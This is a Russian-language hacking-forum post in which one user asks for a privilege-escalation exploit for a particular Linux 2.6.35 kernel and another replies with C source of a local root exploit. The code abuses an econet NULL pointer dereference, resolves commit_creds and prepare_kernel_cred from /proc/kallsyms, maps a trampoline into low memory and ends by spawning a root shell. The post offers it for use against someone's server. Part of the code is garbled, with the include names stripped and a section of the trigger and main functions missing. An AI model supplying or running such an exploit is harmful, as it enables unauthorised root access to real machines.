Форум АНТИЧАТ - Показать сообщение отдельно - повышение прав [задай вопрос

Цитата:

Сообщение от Cuko

Здравствуйте, есть что под это ядро?
Linux l17 2.6.35.7-c-s-xxx #1 SMP Sun Oct 3 02:17:12 MSD 2010 x86_64 Intel(R) Xeon(R) CPU X5650 @ 2.67GHz GenuineIntel GNU/Linux

Пробуй это

Код:

*
   * Linux Kernel
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* How many bytes should we clear in our
   * function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
  FILE *f;
  unsigned long addr;
  char dummy;
  char sname[512];
  struct utsname ver;
  int ret;
  int rep = 0;
  int oldstyle = 0;

  f = fopen("/proc/kallsyms", "r");
  if (f == NULL) {
     f = fopen("/proc/ksyms", "r");
     if (f == NULL)
     goto fallback;
     oldstyle = 1;
  }

repeat:
  ret = 0;
  while(ret != EOF) {
     if (!oldstyle)
     ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, sname);
     else {
     ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
     if (ret == 2) {
     char *p;
     if (strstr(sname, "_O/") || strstr(sname, "_S."))
     continue;
     p = strrchr(sname, '_');
     if (p>   ((char *)sname + 5)&&   !strncmp(p - 3, "smp", 3)) {
     p = p - 4;
     while (p>   (char *)sname&&   *(p - 1) == '_')
     p--;
     *p = '\0';
     }
     }
     }
     if (ret == 0) {
     fscanf(f, "%s\n", sname);
     continue;
     }
     if (!strcmp(name, sname)) {
     fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : 
"");
     fclose(f);
     return addr;
     }
  }

  fclose(f);
  if (rep)
     return 0;
fallback:
  uname(&ver);
  if (strncmp(ver.release, "2.6", 3))
     oldstyle = 1;
  sprintf(sname, "/boot/System.map-%s", ver.release);
  f = fopen(sname, "r");
  if (f == NULL)
     return 0;
  rep = 1;
  goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

    commit_creds(prepare_kernel_cred(0));
    return -1;

}

/* Why do I do this?  Because on x86-64, the address of
   * commit_creds and prepare_kernel_cred are loaded relative
   * to rip, which means I can't just copy the above payload
   * into my landing area. */
void __attribute__((regparm(3)))
trampoline()
{

#ifdef __x86_64__
  asm("mov $getroot, %rax; call *%rax;");
#else
  asm("mov $getroot, %eax; call *%eax;");
#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg
   * via sock_no_sendpage, so it's under KERNEL_DS */
int trigger(int * fildes)
{
  int ret;
  struct ifreq ifr;

  memset(&ifr, 0, sizeof(ifr));
  strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

  ret = ioctl(fildes[2], SIOCSIFADDR,&ifr);

  if(ret>   SHIFT;

  payload = mmap((void *)(landing&   ~0xfff), 2 * 4096,
    PROT_READ | PROT_WRITE | PROT_EXEC,
    MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

  if ((long)payload == -1) {
     printf("[*] Failed to mmap() at target address.\n");
     return -1;
  }

  memcpy((void *)landing,&trampoline, 1024);

  clone((int (*)(void *))trigger,
     (void *)((unsigned long)newstack + 65536),
     CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
  &fildes, NULL, NULL, target);

  sleep(1);

  printf("[*] Triggering payload...\n");
  ioctl(fildes[2], 0, NULL);

  if(getuid()) {
     printf("[*] Exploit failed to get root.\n");
     return -1;
  }

  printf("[*] Got root!\n");
  execl("/bin/sh", "/bin/sh", NULL);
}